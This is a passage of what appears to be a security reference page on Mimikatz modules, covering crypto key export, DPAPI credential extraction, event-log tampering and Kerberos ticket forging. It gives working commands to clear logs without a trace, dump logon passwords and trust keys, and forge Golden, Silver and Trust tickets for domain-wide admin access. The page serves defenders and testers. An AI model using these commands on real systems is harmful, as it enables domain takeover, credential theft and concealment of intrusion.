href="https://github.com/gentilkiwi/mimikatz/wiki/module-%7E-crypto#cng"><code>crypto::cng</code></a></li> <li>Despite <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-%7E-crypto#capi"><code>crypto::capi</code></a> or <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-%7E-crypto#cng"><code>crypto::cng</code></a> patch, you must have correct ACL on filesystem to access private keys (UAC&#8230; <img loading="lazy" decoding="async" class="emoji" title=":wink:" src="https://camo.githubusercontent.com/eec6777dbcac389ce120a8b4218edabae0c68f39/68747470733a2f2f6173736574732d63646e2e6769746875622e636f6d2f696d616765732f69636f6e732f656d6f6a692f756e69636f64652f31663630392e706e67" alt=":wink:" width="20" height="20" align="absmiddle" data-canonical-src="https://assets-cdn.github.com/images/icons/emoji/unicode/1f609.png" />)</li> <li>Some <strong>smartcard</strong> crypto providers can report a successfull private export (it&#8217;s not, of course <img loading="lazy" decoding="async" class="emoji" title=":wink:" src="https://camo.githubusercontent.com/eec6777dbcac389ce120a8b4218edabae0c68f39/68747470733a2f2f6173736574732d63646e2e6769746875622e636f6d2f696d616765732f69636f6e732f656d6f6a692f756e69636f64652f31663630392e706e67" alt=":wink:" width="20" height="20" align="absmiddle" data-canonical-src="https://assets-cdn.github.com/images/icons/emoji/unicode/1f609.png" />)</li> </ul> <p><b>CRYPTO::CertToHW </b>&#8211; try to export a software CA to a crypto (virtual)hardware</p> <p><b>CRYPTO::CNG </b>&#8211; (experimental) Patch CNG service for easy export (patches &#8220;KeyIso&#8221; service)</p> <p><b>CRYPTO::Extract &#8211;</b> [experimental] Extract keys from CAPI RSA/AES provider</p> <p><b>CRYPTO::Hash</b> &#8211; hash a password with optional username</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3811" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Hash.png" alt="" width="642" height="119" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Hash.png 1084w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Hash-300x56.png 300w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Hash-768x142.png 768w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Hash-1024x190.png 1024w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Hash-1080x201.png 1080w" sizes="(max-width: 642px) 100vw, 642px" /></p> <p><b>CRYPTO::Keys</b>&#8211; list/export keys containers</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3810" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Keys.png" alt="" width="662" height="150" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Keys.png 1341w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Keys-300x68.png 300w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Keys-768x174.png 768w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Keys-1024x231.png 1024w" sizes="(max-width: 662px) 100vw, 662px" /></p> <p><b>CRYPTO::Providers</b> &#8211; list cryptographic providers</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Providers.jpg" rel="attachment wp-att-2159"><img loading="lazy" decoding="async" class="alignnone wp-image-2159" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Providers.jpg" alt="Mimikatz-Crypto-Providers" width="504" height="333" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Providers.jpg 887w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Providers-300x198.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Providers-768x507.jpg 768w" sizes="(max-width: 504px) 100vw, 504px" /></a></p> <p><b>CRYPTO::SC </b>&#8211; List smartcard readers</p> <p><b>CRYPTO::SCAuth</b>&#8211; Create an authentication certificate (smartcard like) from a CA</p> <p><b>CRYPTO::Stores</b> &#8211; list cryptographic stores</p> <ul> <li>/systemstore &#8211; optional &#8211; the system store that must be used to list stores (default: CERT_SYSTEM_STORE_CURRENT_USER)</li> </ul> <p><span style="text-decoration: underline;">Store Options:</span><br /> CERT_SYSTEM_STORE_CURRENT_USER or CURRENT_USER<br /> CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY or USER_GROUP_POLICY<br /> CERT_SYSTEM_STORE_LOCAL_MACHINE or LOCAL_MACHINE<br /> CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY or LOCAL_MACHINE_GROUP_POLICY<br /> CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE or LOCAL_MACHINE_ENTERPRISE<br /> CERT_SYSTEM_STORE_CURRENT_SERVICE or CURRENT_SERVICE<br /> CERT_SYSTEM_STORE_USERS or USERS<br /> CERT_SYSTEM_STORE_SERVICES or SERVICES</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Stores.jpg" rel="attachment wp-att-2160"><img loading="lazy" decoding="async" class="alignnone wp-image-2160" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Stores.jpg" alt="Mimikatz-Crypto-Stores" width="374" height="215" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Stores.jpg 664w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Stores-300x173.jpg 300w" sizes="(max-width: 374px) 100vw, 374px" /></a></p> <p><b>CRYPTO::System</b> &#8211; Describe a Windows System Certificate (file, TODO:registry or hive).</p> <p>&nbsp;</p> <h3><b><a id="DPAPI"></a>DPAPI</b></h3> <p>The DPAPI Mimikatz module provides capability to extract Windows stored (and protected) credential data using DPAPI.  <a href="https://msdn.microsoft.com/en-us/library/ms995355.aspx">DPAPI </a>is the official Windows method to protect (encrypt) local data (usually passwords).</p> <blockquote><p>Starting with Microsoft® Windows® 2000, the operating system began to provide a data protection application-programming interface (API). This Data Protection API (DPAPI) is a pair of function calls that provide operating system-level data protection services to user and system processes. By operating system-level, we mean a service that is provided by the operating system itself and does not require any additional libraries. By data protection, we mean a service that provides confidentiality of data by using encryption. Because data protection is part of the operating system, every application can now secure data without needing any specific cryptographic code other than the necessary function calls to DPAPI. These calls are two simple functions with various options to modify DPAPI behavior. Overall, DPAPI is an easy-to-use service that will benefit developers who must provide protection for sensitive application data, such as passwords and private keys.</p> <p>DPAPI is a password-based data protection service. It requires a password to provide protection. The drawback, of course, is that all protection provided by DPAPI rests on the password provided. This is offset by DPAPI using proven cryptographic routines, specifically the strong Triple-DES algorithm, and strong keys, which we&#8217;ll cover in more detail later. Because DPAPI is focused on providing protection for users and requires a password to provide this protection, it logically uses the user&#8217;s logon password for protection.</p></blockquote> <p>There has been some work done previously regarding attacking DPAPI:</p> <ul> <li><a href="https://www.elie.net/publication/reversing-dpapi-and-stealing-windows-secrets-offline">Reversing DPAPI and Stealing Windows Secrets Offline</a></li> <li><a href="http://www.passcape.com/index.php?section=docsys&amp;cmd=details&amp;id=28">DPAPI Secrets. Security analysis and data recovery in DPAPI</a></li> </ul> <p>Benjamin Delpy has an Excel spreadsheet on OneDrive which lists Windows locations that may have stored credentials &#8211; <a href="https://onedrive.live.com/view.aspx?resid=A352EBC5934F0254!3104&amp;app=Excel">view the spreadsheet online</a>.</p> <p><b>DPAPI::Blob</b> &#8211; Unprotect a DPAPI blob with API or Masterkey</p> <p><b>DPAPI:Cache</b></p> <p><b>DPAPI::CAPI</b> &#8211; CAPI key test</p> <p><b>DPAPI::Chrome </b>&#8211; Chrome test</p> <p><b>DPAPI::CNG</b> &#8211; CNG key test</p> <p><b>DPAPI::Cred</b> &#8211; CRE test</p> <p><b>DPAPI::CredHist</b> &#8211; Configure a Credhist file</p> <p><b>DPAPI::MasterKey</b> &#8211; Configure a Masterkey file, unprotect (key depending)</p> <p><b>DPAPI::Protect</b> &#8211; Protect data using DPAPI</p> <p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-3809" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-DPAPI-Protect.png" alt="" width="1645" height="1590" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-DPAPI-Protect.png 1645w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-DPAPI-Protect-300x290.png 300w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-DPAPI-Protect-768x742.png 768w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-DPAPI-Protect-1024x990.png 1024w" sizes="(max-width: 1645px) 100vw, 1645px" /></p> <p><b>DPAPI::Vault</b> &#8211; VAULT test</p> <p><b>DPAPI::WIFI</b> &#8211; WIFI test (XML profile required &#8211; <a href="https://onedrive.live.com/view.aspx?resid=A352EBC5934F0254!3104&amp;app=Excel">reference Ben&#8217;s spreadsheet</a>)</p> <p><b>DPAPI::WWAN</b> &#8211; WWAN test (XML profile required &#8211; <a href="https://onedrive.live.com/view.aspx?resid=A352EBC5934F0254!3104&amp;app=Excel">reference Ben&#8217;s spreadsheet</a>)</p> <p>&nbsp;</p> <h3><b><a id="EVENT"></a>EVENT</b></h3> <p><b>EVENT::Clear</b> &#8211; Clear an event log<br /> <a style="background-color: #ffffff;" href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png"><br /> <img loading="lazy" decoding="async" class="alignnone size-full wp-image-1850" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png" alt="Mimikatz-Event-Clear" width="559" height="168" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png 559w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear-300x90.png 300w" sizes="(max-width: 559px) 100vw, 559px" /></a></p> <p><b>EVENT:::Drop</b> &#8211; (<em><strong>experimental</strong></em>) Patch Events service to avoid new events</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Drop.png"><img loading="lazy" decoding="async" class="alignnone wp-image-1851" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Drop.png" alt="Mimikatz-Event-Drop" width="272" height="48" /></a></p> <p>Note:<br /> Run privilege::debug then event::drop to patch the event log.  Then run Event::Clear to clear the event log without any log cleared event (1102) being logged.</p> <p>&nbsp;</p> <h3><b><a id="IIS"></a>IIS</b></h3> <p>IIS XML Config module</p> <p><b>IIS::AppHost</b></p> <p>&nbsp;</p> <h3><b><a id="KERBEROS"></a>KERBEROS</b></h3> <p>The KERBEROS Mimikatz module is used to interface with the official Microsoft Kerberos API.<br /> No special rights are required for the commands in this module.</p> <p><b>KERBEROS::Ask </b>&#8211; request TGS tickets</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Ask.jpg" rel="attachment wp-att-2692"><img loading="lazy" decoding="async" class="alignnone wp-image-2692" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Ask.jpg" alt="Mimikatz-Kerberos-Ask" width="452" height="144" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Ask.jpg 593w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Ask-300x96.jpg 300w" sizes="(max-width: 452px) 100vw, 452px" /></a></p> <p><b>KERBEROS::Clist</b> &#8211; list tickets in MIT/Heimdall ccache</p> <p><a id="KERBEROSGolden"></a><b>KERBEROS::Golden</b> &#8211; create <a href="https://adsecurity.org/?p=1640">golden</a>/<a href="https://adsecurity.org/?p=1515">silver</a>/<a href="https://adsecurity.org/?p=1588">trust</a> tickets<br /> The capability of this command is based on the password hash type retrieved.</p> <table style="height: 109px;" width="468"> <tbody> <tr> <td width="183"><b>Type</b></td> <td width="200"><b>Requirement</b></td> <td width="400"><b>Scope</b></td> </tr> <tr> <td width="183"><a href="https://adsecurity.org/?p=1640">Golden</a></td> <td width="200">KRBTGT hash</td> <td width="400">Domain/Forest</td> </tr> <tr> <td width="183"><a href="https://adsecurity.org/?p=1515">Silver</a></td> <td width="200">Service hash</td> <td width="400">Service</td> </tr> <tr> <td width="183"><a href="https://adsecurity.org/?p=1588">Trust</a></td> <td width="200">Trust hash</td> <td width="400">Domain/Forest -&gt; Domain/Forest<br /> (based on account access)</td> </tr> </tbody> </table> <h4><span style="text-decoration: underline;"><a id="GoldenTicket"></a><strong>Golden Ticket</strong></span></h4> <p>A Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign.</p> <p>A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. Since the Golden Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. The Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using the domain’s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account.</p> <p>To summarize, once an attacker gets access to the KRBTGT password hash, they can create Golden Tickets (TGT) that provide access to anything in AD at any time.</p> <p><span style="text-decoration: underline;">Mimikatz Golden Ticket Command Reference:</span></p> <p>The Mimikatz command to create a golden ticket is “kerberos::golden”</p> <ul type="disc"> <li>/domain &#8211; the fully qualified domain name. In this example: “lab.adsecurity.org”.</li> <li>/sid &#8211; the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”.</li> <li>/sids &#8211; Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1473643419-774954089-5872329127-519”. T<a href="https://adsecurity.org/?p=1640">his parameter adds the provided SIDs to the SID History parameter.</a></li> <li>/user &#8211; username to impersonate</li> <li>/groups (optional) – group RIDs the user is a member of (the first is the primary group).<br /> Add user or computer account RIDs to receive the same access.<br /> Default Groups: 513,512,520,518,519 for the well-known Administrator&#8217;s groups (listed below).</li> <li>/krbtgt – NTLM password hash for the domain KDC service account (KRBTGT). Used to encrypt and sign the TGT.</li> <li>/ticket (optional) – provide a path and name for saving the Golden Ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.</li> <li>/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.</li> <li>/id (optional) &#8211; user RID. Mimikatz default is 500 (the default Administrator account RID).</li> <li>/startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0.</li> <li>/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes).</li> <li>/renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).</li> <li>/sids (optional) &#8211; set to be the SID of the Enterprise Admins group in the AD forest ([ADRootDomainSID]-519) to spoof Enterprise Admin rights throughout the AD forest (AD admin in every domain in the AD Forest).</li> <li>/aes128 &#8211; the AES128 key</li> <li>/aes256 &#8211; the AES256 key</li> </ul> <p><span style="text-decoration: underline;">Golden Ticket Default Groups:</span></p> <ul type="disc"> <li>Domain Users SID: S-1-5-21&lt;DOMAINID&gt;-513</li> <li>Domain Admins SID: S-1-5-21&lt;DOMAINID&gt;-512</li> <li>Schema Admins SID: S-1-5-21&lt;DOMAINID&gt;-518</li> <li>Enterprise Admins SID: S-1-5-21&lt;DOMAINID&gt;-519  (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights)</li> <li>Group Policy Creator Owners SID: S-1-5-21&lt;DOMAINID&gt;-520</li> </ul> <p>kerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt</p> <p>Command Example:<br /> <em>.\mimikatz &#8220;kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt&#8221; exit</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-CreateGoldenTicket-DarthVader2.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1889" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-CreateGoldenTicket-DarthVader2.png" alt="Mimikatz-CreateGoldenTicket-DarthVader2" width="963" height="510" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-CreateGoldenTicket-DarthVader2.png 963w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-CreateGoldenTicket-DarthVader2-300x159.png 300w" sizes="(max-width: 963px) 100vw, 963px" /></a></p> <p>Golden Ticket References:</p> <p>* <a href="https://adsecurity.org/?p=1640">Golden Tickets are now More Golden (with SID History)</a></p> <p><strong>Update1/5/2016:</strong><br /> In early January 2015, I shared with customers indicators for detecting forged Kerberos tickets and subsequently presented this information at BSides Charm 2015. Soon after, Mimikatz was updated with a domain field that was set to static values, usually containing the string &#8220;eo.oe&#8221;. As of the <a href="https://github.com/gentilkiwi/mimikatz">Mimikatz update dated 1/5/2016</a>, forged Kerberos tickets no longer include a domain anomaly since <a href="https://github.com/gentilkiwi/mimikatz/commit/fbb32cdcfa688892ab91b98044c453414193bb74#diff-60c3d6f46631121e0d6f97c2a2e143c9R602">the netbios domain name is placed in the domain component of the Kerberos ticket</a>.</p> <p>Mimikatz code diff:<br /> <a href="https://adsecurity.org/wp-content/uploads/2015/05/GT-DomainFieldUpdate-20150105.jpg" rel="attachment wp-att-2486"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-2486" src="https://adsecurity.org/wp-content/uploads/2015/05/GT-DomainFieldUpdate-20150105.jpg" alt="GT-DomainFieldUpdate-20150105" width="1495" height="121" srcset="https://adsecurity.org/wp-content/uploads/2015/05/GT-DomainFieldUpdate-20150105.jpg 1495w, https://adsecurity.org/wp-content/uploads/2015/05/GT-DomainFieldUpdate-20150105-300x24.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/05/GT-DomainFieldUpdate-20150105-768x62.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/05/GT-DomainFieldUpdate-20150105-1024x83.jpg 1024w" sizes="(max-width: 1495px) 100vw, 1495px" /></a></p> <p>More information on the difficulty of detecting forged Kerberos tickets (Golden Tickets, Silver Tickets, etc) in the in the <a href="https://adsecurity.org/?p=1515#DetectingForgedKerberosTickets">Detecting Forged Kerberos Tickets section</a>.</p> <p>&nbsp;</p> <h4><span style="text-decoration: underline;"><a id="SilverTicket"></a><strong>Silver Ticket</strong></span></h4> <p>A Silver Ticket is a TGS (similar to TGT in format) using the target service account’s (identified by SPN mapping) NTLM password hash to encrypt and sign.<br /> The Mimikatz command to create a silver ticket is “kerberos::golden” (yes, you run &#8216;golden&#8217; to create silver tickets).</p> <p><span style="text-decoration: underline;">Mimikatz Silver Ticket Command Reference:</span></p> <ul type="disc"> <li><strong>/</strong>domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.</li> <li><strong>/</strong>sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”.</li> <li>/sids &#8211; Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1473643419-774954089-5872329127-519”. T<a href="https://adsecurity.org/?p=1640">his parameter adds the provided SIDs to the SID History parameter.</a></li> <li><strong>/</strong>user – username to impersonate</li> <li>/groups (optional) – group RIDs the user is a member of (the first is the primary group)<br /> default: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).</li> <li><strong>/</strong>ticket (optional) – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.</li> <li>/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.</li> <li><strong>/</strong>id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).</li> <li>/startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0.</li> <li>/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes).</li> <li><strong>/</strong>renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).</li> <li>/aes128 &#8211; the AES128 key</li> <li>/aes256 &#8211; the AES256 key</li> </ul> <p><span style="text-decoration: underline;">Silver Ticket Required Parameters:</span></p> <ul type="disc"> <li><strong>/</strong>target – the target server’s FQDN.</li> <li><strong>/</strong>service – the kerberos service running on the target server. This is the Service Principal Name class (or type) such as cifs, http, mssql.</li> <li><strong>/</strong>rc4 – the NTLM hash for the service (computer account or user account)</li> </ul> <p><span style="text-decoration: underline;">Silver Ticket Default Groups:</span></p> <ul type="disc"> <li>Domain Users SID: S-1-5-21&lt;DOMAINID&gt;-513</li> <li>Domain Admins SID: S-1-5-21&lt;DOMAINID&gt;-512</li> <li>Schema Admins SID: S-1-5-21&lt;DOMAINID&gt;-518</li> <li>Enterprise Admins SID: S-1-5-21&lt;DOMAINID&gt;-519  (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights)</li> <li>Group Policy Creator Owners SID: S-1-5-21&lt;DOMAINID&gt;-520</li> </ul> <p><span style="text-decoration: underline;">Example Mimikatz Command to Create a Silver Ticket:</span></p> <p>The following Mimikatz command creates a Silver Ticket for the CIFS service on the server adsmswin2k8r2.lab.adsecurity.org. In order for this Silver Ticket to be successfully created, the AD computer account password hash for adsmswin2k8r2.lab.adsecurity.org needs to be discovered, either from an AD domain dump or by running Mimikatz on the local system as shown above (<em>Mimikatz “privilege::debug” “sekurlsa::logonpasswords” exit</em>). The NTLM password hash is used with the /rc4 paramteer. The service SPN type also needs to be identified in the /service parameter. Finally, the target computer’s fully-qualified domain name needs to be provided in the /target parameter. Don’t forget the domain SID in the /sid parameter.</p> <p><em>mimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/SilverTicketUsage-MemberServer-CIFS-AdminShare2.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1890" src="https://adsecurity.org/wp-content/uploads/2015/09/SilverTicketUsage-MemberServer-CIFS-AdminShare2.png" alt="SilverTicketUsage-MemberServer-CIFS-AdminShare2" width="961" height="343" srcset="https://adsecurity.org/wp-content/uploads/2015/09/SilverTicketUsage-MemberServer-CIFS-AdminShare2.png 961w, https://adsecurity.org/wp-content/uploads/2015/09/SilverTicketUsage-MemberServer-CIFS-AdminShare2-300x107.png 300w" sizes="(max-width: 961px) 100vw, 961px" /></a></p> <p>&nbsp;</p> <p>&nbsp;</p> <h5><span style="text-decoration: underline;"><a id="TrustTicket"></a>Trust Ticket</span></h5> <p>Once the Active Directory Trust password hash is determined (<a href="#LSADUMP">Mimikatz &#8220;privilege::debug&#8221; &#8220;lsadump::trust /patch&#8221; exit</a>), a trust ticket can be generated.<strong><br /> </strong><a href="https://adsecurity.org/?p=1588">More background on Trust Tickets.</a><strong><br /> </strong></p> <p><span style="text-decoration: underline;">Forging Internal AD Forest Trust Tickets</span></p> <p>In this example, Trust tickets leverage two additional tools Benjamin Delpy wrote called AskTGS and Kirbikator.</p> <p><b>Step 1: Dumping trust passwords (trust keys)</b></p> <p>Current Mimikatz versions can extract the trust keys (passwords).<br /> *  <a href="#LSADUMP">Mimikatz &#8220;privilege::debug&#8221; &#8220;lsadump::trust /patch&#8221; exit</a><strong><br /> </strong></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-DumpTrustKeys.jpg"><img loading="lazy" decoding="async" class="alignnone wp-image-1697" src="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-DumpTrustKeys.jpg" alt="TrustTicket-v2-Mimikatz-DumpTrustKeys" width="761" height="577" srcset="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-DumpTrustKeys.jpg 677w, https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-DumpTrustKeys-300x227.jpg 300w" sizes="(max-width: 761px) 100vw, 761px" /></a></p> <p><b>Step 2: Create a forged trust ticket (inter-realm TGT) using Mimikatz</b></p> <p>Forge the trust ticket which states the ticket holder is an Enterprise Admin in the AD Forest (leveraging SIDHistory, “sids”, across trusts in Mimikatz, my “contribution” to Mimikatz). This enables full administrative access from a child domain to the parent domain. Note that this account doesn’t have to exist anywhere as it is effectively a Golden Ticket across the trust.</p> <p>The Mimikatz command to create a trust ticket is “kerberos::golden”</p> <ul type="disc"> <li><strong>/</strong>domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.</li> <li><strong>/</strong>sid – the SID of the domain. In this example: “S-1-5-21-3677078698-724690114-1972670770”.</li> <li>/sids &#8211; Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1581655573-3923512380-696647894-519”. T<a href="https://adsecurity.org/?p=1640">his parameter adds the provided SIDs to the SID History parameter.</a></li> <li><strong>/</strong>user – username to impersonate</li> <li>/groups (optional) – group RIDs the user is a member of (the first is the primary group)<br /> default: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).</li> <li><strong>/</strong>ticket (optional) – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.</li> <li>/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.</li> <li><strong>/</strong>id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).</li> <li>/startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0.</li> <li>/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes).</li> <li><strong>/</strong>renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).</li> <li>/aes128 &#8211; the AES128 key</li> <li>/aes256 &#8211; the AES256 key</li> </ul> <p><span style="text-decoration: underline;">Trust Ticket Specific Required Parameters:</span></p> <ul type="disc"> <li><strong>/</strong>target – the target domain&#8217;s FQDN.</li> <li><strong>/</strong>service – the kerberos service running in the target domain (krbtgt).</li> <li><strong>/</strong>rc4 – the NTLM hash for the service kerberos service account (krbtgt).</li> <li><strong>/</strong>ticket – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.</li> </ul> <p><span style="text-decoration: underline;">Trust Ticket Default Groups:</span></p> <ul type="disc"> <li>Domain Users SID: S-1-5-21&lt;DOMAINID&gt;-513</li> <li>Domain Admins SID: S-1-5-21&lt;DOMAINID&gt;-512</li> <li>Schema Admins SID: S-1-5-21&lt;DOMAINID&gt;-518</li> <li>Enterprise Admins SID: S-1-5-21&lt;DOMAINID&gt;-519  (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights)</li> <li>Group Policy Creator Owners SID: S-1-5-21&lt;DOMAINID&gt;-520</li> </ul> <p><em>Mimikatz &#8220;Kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770 <strong>/sids:S-1-5-21-1581655573-3923512380-696647894-519</strong> /rc4:49ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi&#8221; exit</em></p> <p>Note: Using the /sids parameter will create a trust ticket for the target AD domain that says the holder is an Enterprise Admin.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-Create-GoldenTrustTicket-ADSECLAB-DarthVader-wSIDHistory.jpg"><img loading="lazy" decoding="async" class="alignnone wp-image-1694" src="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-Create-GoldenTrustTicket-ADSECLAB-DarthVader-wSIDHistory.jpg" alt="TrustTicket-v2-Mimikatz-Create-GoldenTrustTicket-ADSECLAB-DarthVader-wSIDHistory" width="898" height="418" srcset="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-Create-GoldenTrustTicket-ADSECLAB-DarthVader-wSIDHistory.jpg 773w, https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-Create-GoldenTrustTicket-ADSECLAB-DarthVader-wSIDHistory-300x140.jpg 300w" sizes="(max-width: 898px) 100vw, 898px" /></a></p> <p>NOTE: <a href="https://adsecurity.org/?p=1515">Mimikatz generates Silver Tickets with a hard-coded domain value which may appear in some events. It&#8217;s also likely the domain field in logon/logoff events relating to a forged ticket will have anomalies when compared to valid Kerberos authentication.</a></p> <p><b>Step 3: Use the Trust Ticket file created in Step 2 to get a TGS for the targeted service in the destination domain. Save the TGS to a file.</b></p> <p>The resulting TGS provides EA access to the parent (root) domain’s Domain Controller by targeting the CIFS service in this example (but it could target any).</p> <p><em>Asktgs c:\temp\tickets\EA-ADSECLABCHILD.kirbi CIFS/ADSDC02.lab.adsecurity.org</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-AskTGS-Get-CIFS-ADSDC02-with-EA-SIDHistory.jpg"><img 